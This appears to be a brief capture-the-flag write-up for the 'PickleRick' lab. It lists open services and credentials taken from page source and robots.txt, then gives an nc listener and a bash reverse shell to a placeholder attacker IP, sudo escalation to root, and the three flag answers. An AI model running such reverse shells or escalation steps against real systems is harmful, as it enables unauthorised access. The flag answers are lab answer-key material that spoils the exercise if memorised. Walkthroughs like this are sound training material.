PickleRick

Services

• HTTP (Apache/2.4.18)

• SSH (OpenSSH 7.2p2)

Web APP URLs

• /login.php

• /robots.txt

Login Panel

username: R1ckRul3s (from page source of homepage) password: Wubbalubbadubdub (from robots.txt)

First Ingredient

• Login to /login.php using above credentials

• start listener on attacker's machine using

  nc -nlvp ATTACKER_PORT

• create bash reverse shell (since, cat is disabled) using bash -c 'exec bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT <&1'

• read secret file

  cat Sup3rS3cretPickl3Ingred.txt

  mr. meeseek hair

Second Ingredient

• using command shell read second ingredient file

  cat "/home/rick/second ingredients"

  1 jerry tear

Third Ingredient

• change user to ubuntu then root

  sudo su ubuntu
  sudo su root

• Read third file

  cat /root/3rd.txt

  fleeb juice